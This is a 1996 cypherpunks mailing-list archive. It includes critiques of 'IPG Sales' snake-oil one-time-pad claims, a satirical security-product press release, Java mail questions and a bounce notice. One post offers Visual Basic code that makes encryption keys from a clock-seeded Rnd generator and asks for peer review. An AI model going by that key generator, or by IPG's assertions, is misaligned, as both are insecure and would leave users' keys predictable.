means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSqqvSoZzwIn1bdtAQHIMQF+N7aisKNZZ+wM7sSUSRxfo7cZ2DC1maxR
8i3tFjE8yPc6CPbuQf4j5vwcPBa64D9N
=IPIj
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 17:57:35 +0800
Subject: No Subject
Message-ID: <QQadvz21970.199602210954@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

David A Wagner wrote:
[..]
>         A full review of Z-Mail for Windows and other Z-Mail products is
> available over NCD Software's site on the World Wide Web at
> http://www.ncd.com/Z-Code/zcode.html, or via e-mail at info@z-code.com.
> ViaCrypt information is available over the Web at http://www.viacrypt.com

ViaCrypt's page talks about a beta version of PGP 4.0 available
at some sites. Hmmm.

The Windows version is tantalizing. A PGP.DLL would be a wonderful thing.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSqspioZzwIn1bdtAQHUYgGApl4OV143Q/LL2/mPC1m0PDHiGYbVB4xm
sB66fpLRrpjHBYxqYg/fGTL1rN6Z4Ydu
=OmqS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 17:58:26 +0800
Subject: No Subject
Message-ID: <QQadvz22049.199602210955@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 21 Feb 1996, Tim Philp wrote:

> 	The issue that I have not seen you address is one that has been
> brought up by several posters to this thread. This issue has to do with
> the fact that if you generate all of the keys (or whatever) what is to
> stop someone from offering one of your employees a LARGE bribe to cough up
> the keys? 

Not to mention GAK.  No bribe needed - just a "suit" showing up with what
looks like a court order. 
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 18:28:10 +0800
Subject: No Subject
Message-ID: <QQadwb23522.199602211016@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


At 2:04 PM 2/14/96, Robert Hettinga wrote:

>Perry and Tim,
>
>Why don't you two have sex already? The tension around here is getting
>unbearable...

And why don't you stop cluttering up the list with supposedly cute stuff
like this?

The couple of fairly short messages I've written in response to comments by
Perry are *as nothing* compared to the tons of verbiage in the Jim Bell
flame wars, the VZNUri/Detweiler flames, and even the Black Unicorn vs.
Netscape battle.

(If anyone can point to examples where I have engaged in protracted--more
than a couple of short messages--flames, please send me pointers to these
examples in private mail. I claim no especial morality, but I do think I've
stayed out of ongoing flame wars. I haven't even commented on
"assassination politics," even though it's just a watered-down and
poorly-thought-out version of what I wrote about in 1988...easier to just
delete the ramblings.)

And yet people like Bob and Uni feel compelled to throw their two cents in
about what a spectacle this is.

Get real.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 18:21:58 +0800
Subject: No Subject
Message-ID: <QQadwb23694.199602211018@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

IPG Sales wrote:

[Notice "Sales" wrote this...]
> We are not currently revealing all the details of our system because of
> patents in process, and other relat6ed matters. We are offering the

Do you know what "patent pending" means?

> software. You should be able to readily decompile it and determine the
> algorithms used andf how they are used to generate random number sequences

If you're so concerned about secrecy and patents, why encourage anyone
to reverse engineer it?  If it's as secure as you say (and it's not)
and yet unpatented, then you sure as hell don't want anyone reverse
engineering it... you don't even want to publish the compiled binary
either (if that were true).

[..]
> If you are aware of encrtypting technology, you recognize that hardware
> prime number cycle wheels for the basis of some of the most secured
> hardware systems employed for encryption. We simply expand that 

You mean like Enigma machines? (chuckle)

> Thus we can eliminate the need to have the length of the OTP to be equal
> to the length of the file - if you do not belive that it works, try it
> and see - it takes inly a few hours to set such a trial up. We generated

OTP = One Time Pad
      ^^^
Used once. Not repeated. Equals the size of the file. Completely
erased from the cosmos after decryption and never seen again. Anything
else just isn't a one time pad.

> over 790 gigabytes of charcaters, on multiple backups, and tested. Our
> standard deviations, chi squares, Delta ICs for bits, characters, sets,
> and the entire set were random. The sets are random, and you can take
> that to the bank.

Gee. It sure looks random. Must be secure. [Sarcarm mode off]

> Someone, will decompile it and discover that it is truly random, at least
> from the practical usage basis. But we need that time to file patents,
> cvopyrights and the like.

Truly random? If it's based on an algorithm and not an unpredictable
source of external randomness, it just ain't random.

If it's fed the same seed, will it produce the same output? If so,
'taint random. Don't call it that. Just don't.

> The IPG system solves the key management problem and produces a truly

Oh really? And how does it do that? ...

[..]
> "Unless we know, we do not experience by talking," Plato

Interesting that you quote Plato, who believed in such fairy tales
as essential orbs of "truth", "beauty", etc. floating around in
some neuminal hyperspace.  Faith was rather important, and the western
religions were really damn peachy about it.

Oh, I get it... OTP stands for Onto-Theological Platonism. Philisophical 
snake oil...
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMSqxhCoZzwIn1bdtAQFrnwGAxffXmBmuZchYHTFapCNqc5xxiEqDy7BD
RL9cJeuP/2CHnVUgvfRX5uHfabPZz+Z7
=akNJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 18:26:51 +0800
Subject: No Subject
Message-ID: <QQadwb23961.199602211023@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


I am answering the courteous inquiry from Thomas Womack about my request for 
help with a Visual Basic-only PRNG.  The premise is that those who will not or
can not afford hardware-based RNG's need something relatively secure in the
face of nothing at all or at best a lesser implementation.
 
I was reluctant to post code at first but rather asked for an interpretation 
of 10 runs of 9999 characters each.  I want peer review of source code but 
the threads in CypherPunks have been of a shall we say "low signal to noise" 
ratio of late.  Even more so than usual.  I just didn't want to feed the 
beast at this time.
 
That said, here's the outline of what I'm doing.  A splash screen loads first
displaying a random tip'o'the day about good key management.  I make use of 
the getcurrenttime() Win API a lot.  Said to have 50 millicent increments.
 
 
' Load splash screen first
Sub Form_Load ()
 
  ' first randomize using number of milliseconds since Windows was launched
  Randomize getcurrenttime()
 
  ' then rotate the tip'o'the day (30 currently, adding unknown some delay)
  For j = 1 To Int(n * Rnd + 1)
    Select Case j
      Case 1
        hint.Caption = "You passphrase is SUPPOSED to look like gibberish."
      ...
      Case n
        hint.Caption = "Change your passphrases often."
       End Select
  Next j
 
End Sub
 
' user clicks an OK button and up comes 2nd screen
Sub Form_Load ()
 
 ' mix things up
  Randomize getcurrenttime()
  
End Sub
 
 
' main screen's OK button
Sub Command1_Click ()
  
  Screen.MousePointer = 11
  scramble = ""
  keyLen = Val(keyLength.Text)
 
  ' repeat for the number of characters in the desired key
  For i = 1 To keyLen
    ' character set is ASCII 33 to ASCII 127
    scramble = scramble & Chr$(Int(94 * Rnd + 33))
    ' reseed
    Randomize getcurrenttime()
    ' now make it wobble to throw off any regularity in the loop
    ' this loop works because as the 7 increases, so does execution time
    For j = 1 To Int(7 * Rnd + 1)
      'idle
    Next j
  Next
  
  Screen.MousePointer = 0
  secondaryForm.keyLabel.Caption = scramble
 
End Sub
 
 
I'd be happy with an analysis of just how random this is.  My working 
assumption is that over a >8 character key, it beats trying to dream one 
up in one's head.  Besides the getcurrenttime API, I don't know what else 
to sample without an external DLL or hardware.
 
I started out attempting a keyboard timing routine but had second thoughts.
My software company has been doing bar code printing tools for years. Now 
we're moving from simple encoding to encryption.
 
After playing with RSA Secure briefly, I realized that one way to spoof a 
request to type willy nilly to initialize anything is to use a bar code 
scanner.  The common type is sometimes called a wedge because you plug your 
keyboard into it, and it into the keyboard port.  It's wedged between the 
keyboard and the CPU.
 
So when asked to type (obstensibly to input randomly timed events) I scan 
a very large block of bar coded material.  I fill the keyboard buffer at a 
fixed rate; the throughput of my scanner and PC.  If I scan a large bar 
code, yes, I'll fill the keyboard buffer as fast as possible.  Little 
entropy in my eyes.
 
Oh yeah, with common symbologies like Code 39 and Code 128, I can recreate 
the whole lower ASCII 128 including tabs, LF/CR, etc.  So I can tab to 
activate buttons in some UI scenarios. Or do macros any any combination that 
may include control characters.
 
So gang, what about bar code scanners being used to thwart random typing 
requests??
 
Jerry Whiting
jwhiting@azalea.com 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 18:29:28 +0800
Subject: No Subject
Message-ID: <QQadwb24244.199602211026@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp wrote:
> 
> CompuScam, Inc., an unwholly-owned invention of InventiData, is pleased to
> announce its latest offering in the growingly lucrative Internet Security
> market.  Called "Secure Users Everywhere", SUE is "guaranteed privacy
> protection for citizen-units everywhere," according to Ed Carp, Chief
> Scientist, Chief Executive Officer, and Chief Everything Else for
> CompuScam.  In today's press release, Carp said that "SUE is destined to
> become the dominant market leader in a field full of inferior products."
> 
> SUE is designed to work in any environment, and provides "Fort Knox"
> security for Internet users who wish to transact business over the "net".
> "Up until now, the Internet has been totally exposed, totally wide open to
> every 12-year-old wannabe cracker with a cheap PC and a modem," said Carp,
> "but with SUE, all that has changed overnight.  Now SUE users can safely
> and securely exchange the most sensitive of documents, including credit
> card and checking account numbers, SSN, employee information, credit
> reports, gold bars - virtually anything that is of value can now be safely
> transported across the Internet."
> 
> No details were immediately available on the technical foundations of SUE,
> but Carp indicated that this is to provide enhanced security for its
> customers, adding that "you wouldn't want everyone to see your data, would
> you?  Then why would you want everyone to know about how this software
> works?"  According to CompuScam, SUE is composed of a small software "TSR"
> that is loaded into memory when a computer is first powered up, and a
> proprietary hardware device, known as a CUD ("compulsive exteriorization
> device") that provides "total security" for the software.  Carp indicated
> that the software TSR is "completely ITAR/RNG/SHA/RC4/BBS/RSA/MD5
> compliant, and meets all government standards for the very highest levels
> of cryptographic software, including FIPS-180, SESAME, and STU-III."  The
> hardware device is reportedly PRNG/RNG compliant.
> 
> Additionally, the SUE product is reportedly backwards-compatible with most
> other manufacturer's "inferior" cryptographic products, including products
> from Digital Pathworks, AT&T, VeriSign, IBM, and others.  Asked whether or
> not SUE is compatible with electronic cash offerings from First Virtual
> and others, Carp said, "Our total solution is so comprehensive, we're
> fixed problems that even the National Security Agency hasn't thought of
> yet.  We've also totally addressed the major problems that First Virtual
> brought to light last month in their press release," adding that no other
> cryptographic software maker had even responded to First Virtual's
> announcement, "let alone done anything about it.  We are acting now to
> protect our customers and children on the Internet by providing total
> coverage of the market."
> 
> Carp denied rumors that the CompuScam was nothing but a mailbox located in
> a Mailboxes Etc., branch office in Garland.  "I believe you will find that
> a reporter obtained an early press release which contained an
> typographical error in our suite number," adding that the company is
> expecting to move soon to new offices near Sun Microsystems in Palo Alto,
> adding that "the proximity to so many Silicon Valley companies will no
> doubt enhance the value of our
> stock^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^Hquality of our software."
> 
> When asked about the timing of the release, noting that it was only a few
> days before the company was scheduled to go public, Carp said, "this is an
> absolutely wonderful opportunity for investors to get in on the ground
> floor of this new technology" adding something about a new Porsche which
> the reporters didn't quite catch.
> 
> SUE is available for PCs running all versions of Microsoft Windows,
> Windows 95, Windows NT and MS-DOS, as well as all UNIX and UNIX-like
> platforms, and MVS.  The CUD hardware device is available in .357, .45,
> .44 Magnum, and 9MM versions.  Pricing was not immediately available.
> --

	And of course, export license has been granted to Iraq, Iran
	and the rest of the "non-hostile challenged" (?) world.
	Wonderful!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Wed, 21 Feb 1996 20:00:09 +0800
To: llurch@networking.stanford.edu
Subject: Re: Bravo, mostly (Re: Banned Zambian newspaper now on the Web)
Message-ID: <199602211141.FAA00492@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>[Please forward along to fight-censorship if non-redundant]
>
>I applaud your quick response. However, you should read more and consult
>people with area expertise. At least do the five-minute AltaVista and 
>DejaNews search I did; don't just trust the information that gets sent to 
>you, or you're likely to be used. 
[...]

Good advice.  In this case, the copy of the banned issue of _The Post_ came
from a confidential source, but I have reason to believe it is a true copy.
I know very little about Zambia and had nothing to do with the additional
commentary.


                          | (Douglas) Hofstadter's Law:
                          | It always takes longer than you expect, even 
Frank Stuart              | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 18:45:13 +0800
Subject: No Subject
Message-ID: <QQadwc25022.199602211042@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


I wrote a program which does secret sharing calles SecShare. It is on my
home page. As my first venture into crypto programming it is a major
kludge, but it does the job.

        -Lance


----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 18:47:38 +0800
Subject: No Subject
Message-ID: <QQadwc25063.199602211042@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Wayne Madsen wrote somewhere:
> A knowledgeable government source claims that
> the NSA has concluded agreements with [...] Netscape to
> permit the introduction of the means to prevent the anonymity of
> Internet electronic mail, [...]

I suspect this may actually mean that they're pushing Netscape to
incorporate cryptographic authentication into browser email, which I think is
a useful development. I'm not aware of any public remailers previously 
operated by Netscape Communications Corp. that have now shut down. ;)

At any rate, it's an excuse for me to ask some questions:

(0) I'm not aware of any class library objects or methods in stand-alone Java
for calling the local mail transport agent. Is there any class library 
support in Java+{Navigator, HotJava, Mosaic, NetCruiser, the AOL web tool, 
etc.} for applet calls to the local mail agent that's configured in the 
browser ?  

I would prefer not to reimplement SMTP using the Socket class in my own 
applets. Ideally I'd like to have an applet that presents a form with some 
entry boxes and check boxes, quantizes and encrypts the input according to 
the check box settings, and spews the resulting byte streams to the MTA. 

(1) As I recall, I used to be able to set (as an Option) the path and name of 
the local MTA (e.g. /usr/lib/sendmail) in an earlier version of Netscape. 
That seems to have disappeared in Navigator 2.0. Is there indeed no longer a 
way to set that ?  

It occurs to me that we could have achieved partial integration of
remailing into Navigator quite cheaply with that option.

Comments from Sun and/or Netscape and/or anyone else would be welcome.
Thanks :)

-Lewis	"You're always disappointed, nothing seems to keep you high -- drive 
	your bargains, push your papers, win your medals, fuck your strangers;
	don't it leave you on the empty side ?"  (Joni Mitchell, 1972)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 18:52:24 +0800
Subject: No Subject
Message-ID: <QQadwd25429.199602211050@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


>(0) I'm not aware of any class library objects or methods in stand-alone Java
>for calling the local mail transport agent. Is there any class library 
>support in Java+{Navigator, HotJava, Mosaic, NetCruiser, the AOL web tool, 
>etc.} for applet calls to the local mail agent that's configured in the 
>browser ?  

A look at the documentation does not show one.  You may have to implement
the whole MTA protocol yourself :-(.  It does occur to me that such a
library would only be possible in a browser that knows (via configuration)
how to find MTAs.

Good luck - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 18:55:27 +0800
Subject: No Subject
Message-ID: <QQadwd25440.199602211050@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> > Do we have to show an exploitable flaw? Or we have to do the exploit? That
> > might be expensive. Who would judge the contest?
> > 
> > The alogrithm aside, IPG provides the intial OTP. Seems to me that IPG can
> > read the messages. End of story.
> > 
> Hedging, hedging, hedging - why? I did not noitice this in my first 

I think he meant that it might cost him several $10000 in computing time to
actually demonstrate a flaw, should it be found. Proving the flaw exists
should be enough. If a company really needs unbreakable encryption, a few
hundred thou isn't too much for an attacker to pay for million dollar secrets.
On the other hand, it would be quite a bit for an individual to come up with,
just to illustrate a point.

And this thing about keeping a copy of the one-time-pad, now just why is it
that you need to at all?? After all, if it doesn't arrive safely, then who
knows who has it... And if so, then you don't need a copy that could, say,
accidently get smuggled out and sold to [foreign government, domestic
covernment, competitor, curious onlooker - pick one] for the right sum of
money.

For your next version, you might want to add in the capability for a slight
remixing of the random pool at both ends (a passphrase, for example)
protected by secure-hashing properly-sized chunks. There's nothing like
being able to lock the door behind you, ya know...

Don
- -- 
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@fryser.dk.net
* This user insured by the Smith, Wesson, & Zimmermann insurance company *

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMSrSo8La+QKZS485AQFXeAL6AviaeMve7k6Oh1F5qix9EOBT29wSXXMa
NAcr8PSTFfQ7kd1FHz2A1N4OPXO+AW2vVPLWiulU/bcXoP5K/+mU36wM17bo9nXz
0tiVmyZcDV4bn6Vs373oYIKt2W0rj02K
=sJQO
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Wed, 21 Feb 1996 19:00:48 +0800
Subject: No Subject
Message-ID: <QQadwd25833.199602211056@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


The original message was received at Wed, 21 Feb 1996 03:37:32 -0500 (EST)
from ncrgw1@localhost

   ----- The following addresses have delivery notifications -----
sandiegoca.ncr.com!chris.claborne  (unrecoverable error)

   ----- Transcript of session follows -----
451 sandiegoca.ncr.com!chris.claborne... reply: read error from ncr-sd.sandiegoca.attgis.com.
550 sandiegoca.ncr.com!chris.claborne... Host unknown (Name server: ncr-sd.sdca.attgis.com.: host not found)

   ----- Message header follows -----

Return-Path: cypherpunks@toad.com
Received: from ncrgw1.UUCP (ncrgw1@localhost) by ncrhub5.attgis.com (8.7.3/8.7.3) with UUCP id DAA22660 for sandiegoca.ncr.com!chris.claborne; Wed, 21 Feb 1996 03:37:32 -0500 (EST)
Received: by ncrgw1.ATTGIS.COM; 21 Feb 96 03:37:17 EST
Received: from toad.com by relay3.UU.NET with SMTP 
	id QQadvt15500; Wed, 21 Feb 1996 03:22:15 -0500 (EST)
Received: by toad.com id AA18685; Tue, 20 Feb 96 19:22:49 PST
Received: from cs.umass.edu (freya.cs.umass.edu) by toad.com id AA18672; Tue, 20 Feb 96 19:22:36 PST
Received: from thor.cs.umass.edu by cs.umass.edu (5.65/Ultrix3.0-C)
	id AA26087; Tue, 20 Feb 1996 22:22:16 -0500
Received: (from lmccarth@localhost) by thor.cs.umass.edu (8.6.12/8.6.9) id WAA12154 for cypherpunks@toad.com; Tue, 20 Feb 1996 22:22:15 -0500
From: lmccarth@cs.umass.edu
Message-Id: <199602210322.WAA12154@thor.cs.umass.edu>
Subject: Re: Secure Split
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Date: Tue, 20 Feb 1996 22:22:15 -0500 (EST)
Reply-To: cypherpunks@toad.com (Cypherpunks Mailing List)
In-Reply-To: <9602210251.AA16675@cti02.citenet.net> from "Jean-Francois Avon (JFA Technologies, QC, Canada)" at Feb 20, 96 09:47:39 pm
X-Mailer: ELM [version 2.4 PL25]
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-cypherpunks@toad.com
Precedence: bulk

   ----- Message body suppressed -----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 21 Feb 1996 22:24:43 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <v02120d1aad50107a5006@[192.0.2.1]>
Message-ID: <9602211404.AA16345@alpha>
MIME-Version: 1.0
Content-Type: text/plain



IPG Sales writes:
 > We do not keep copies, we would not be in business 30 days if 
 > we did.

How do you ensure that the keys are not intercepted, duplicated by a
man-in-the-middle, and forwarded?

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
Date: Wed, 21 Feb 1996 22:32:01 +0800
To: IPG Sales <ipgsales@cyberstation.net>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960220140515.9829M-100000@citrine.cyberstation.net>
Message-ID: <Pine.HPP.3.91.960221090314.24258B-100000@hawk.twinds.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 20 Feb 1996, IPG Sales wrote:

Fess up guys. You are either:

1.  A team of undergrads or graduate students conducting an "exploit". 
2.  A Detweiller tentacle. Dr. FC ?
3.  The return of Alice D'nonymous ?
4.  The reason the coderpunks lists was started.

You've got to be ROTFL. 
See my sig.

Arley Carter
Tradewinds Technologies, Inc.
email: ac@hawk.twinds.com
www: http://www.twinds.com

"Trust me. This is a secure product. I'm from <insert your favorite 
corporation or government agency>."
 

> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 
>  
>      
> 
> 
> 
>     
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Wed, 21 Feb 1996 23:21:10 +0800
To: ipgsales@cyberstation.net (IPG Sales)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960220205816.21251A-100000@citrine.cyberstation.net>
Message-ID: <199602211501.KAA05974@homeport.org>
MIME-Version: 1.0
Content-Type: text


	I don't know about Futplex, but Derek and I are well paid for
our time.  In order to find the time to fairly judge this system, I
would expect to be compensated for time spent, in advance.  After all,
I wouldn't want to see your bank account disapear should your system
be broken and the company sold.

	I would be happy to not let this money influence my judging.
After all, the money is in pocket, and I've already expressed doubts
about the system.

	So, if IPG is really interested in retaining me as a judge,
lets discuss terms & conditions.

Adam

IPG Sales wrote:

| Let Derek, Inccarth, and Adam be the aribtion committee, decide whether 
| the system is fataklly flawed or not - we will accept their findings 
| subject to only one caveat, that they have the intellectual honesty to 
| tell the truth. I believe that since Mr. Silvernail and Mr. Metzger have 
| exluded themselves, that Derek, Inccarth and Adam do have that 
| intellectual honesty to tell the truth - is that weighted too much in 
| IPGs favor.   

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: IPG Sales <ipgsales@cyberstation.net>
Date: Thu, 22 Feb 1996 08:20:46 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <v02120d1aad50107a5006@[192.0.2.1]>
Message-ID: <Pine.BSD/.3.91.960220184124.18188A-100000@citrine.cyberstation.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 20 Feb 1996, Lucky Green wrote:

> At 17:22 2/20/96, IPG Sales wrote:
> 
> >If you are able to break the system, and everyone knows what we mean by
> >break, then we will publicly admit that we are snake oil salesmen, and
> >all the other things that Perry Metzger and others called us.
> 
> It is by no means clear to me what "breaking the system" means. One does
> not have to be able to decipher a single message to prove a system to be
> insecure. Moreover, cryptanalysis is economics: is it more expensive to get
> the information by analyzing the crypto than it is to get it by other
> means?
> 
> Do we have to show an exploitable flaw? Or we have to do the exploit? That
> might be expensive. Who would judge the contest?
> 
> The alogrithm aside, IPG provides the intial OTP. Seems to me that IPG can
> read the messages. End of story.
> 
Hedging, hedging, hedging - why? I did not noitice this in my first 
reply - in addition to giving you the company if you can break the 
system, we will give you the company if you can establish, through our 
employees or any other method, that we retain any Ocopies of the TPs, 
any! - for very large systems, we maintain a temporary copy to insure 
safe arrival, by excuting the check system menu item - 
it is immediate destroyed upon system notification. Anyone that wants to 
audit us cazn do so, unannounced at any time - subject to payment ofd 
expenses! We do not keep copies, we would not be in business 30 days if 
we did.

> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.cybrspc.mn.org (Roy M. Silvernail)
Date: Thu, 22 Feb 1996 01:39:33 +0800
To: ipgsales@cyberstation.net (IPG Sales)
Subject: Re: Internet Privacy Guaranteed ad (POTP Jr.)
In-Reply-To: <Pine.BSD/.3.91.960220205816.21251A-100000@citrine.cyberstation.net>
Message-ID: <960221.070612.7F0.rnr.w165w@sendai.cybrspc.mn.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, ipgsales@cyberstation.net writes:

> Unlike Mr. Silvernail, we have a much simplier definition of what we mean 
> by a one time pad

First of all, I note to the list that I have exchanged some email with
IPGsales, whence this reference comes.  I had hoped there would be
enough integrity in IPGsales that sie would note the difference between
private mail and mail to the list.

The gist of my mail has been that IPGsales likes to redefine accepted
terms of art to their own benefit.  I didn't (and don't) define what a
one time pad is.  I simply noted that PRNG-based systems are not one time
pads, and asked that IPGsales refrain from mislabeling their system as
such.

> I do not want to argue semantics with Mr. Silvernail, or Mr. Metzger - 
> they have an opinion - that does not prove them right - they are entitled 
> to their opinion - but they would rather castigate us out of hand than 
> prove us wrong -

Any castigation I offered was far from "out of hand".  IPGsales is
promoting a system using plainly incorrect terminology.  IMHO, this
choice of terminology speaks volumes about the crypto expertise (or lack
thereof) they have brought to the table.

> they want to talk, talk, talk but not do anything. It is
> obviously that both are dodging the issue, by taking their own narrow 
> minded view of what is and is not the truth  - both are all talk but no 
> action - a lot of bull and arbitrary  posturing, but that is all itis, pure 
> unadultarated bull - .

Consider it, then, a response in kind to your own unadulterated bull.

> I believe that since Mr. Silvernail and Mr. Metzger have
> exluded themselves, that Derek, Inccarth and Adam do have that 
> intellectual honesty to tell the truth - is that weighted too much in 
> IPGs favor.

I'll guess here that my refusal to accept IPGsales' new definitions for
accepted terms has been taken as 'excluding myself'.  So be it.  Perhaps
IPGsales is miffed that I said I would advise my clients against their
product.

> What can be more fair than that, you own members can be the entire 
> judging committee - are you afraid of the truth - if you cannot accept 
> that you are. Tthat could be your only real reason fornot  facing it. I 
> believe that many of you are now backtracfking because you are afraid of 
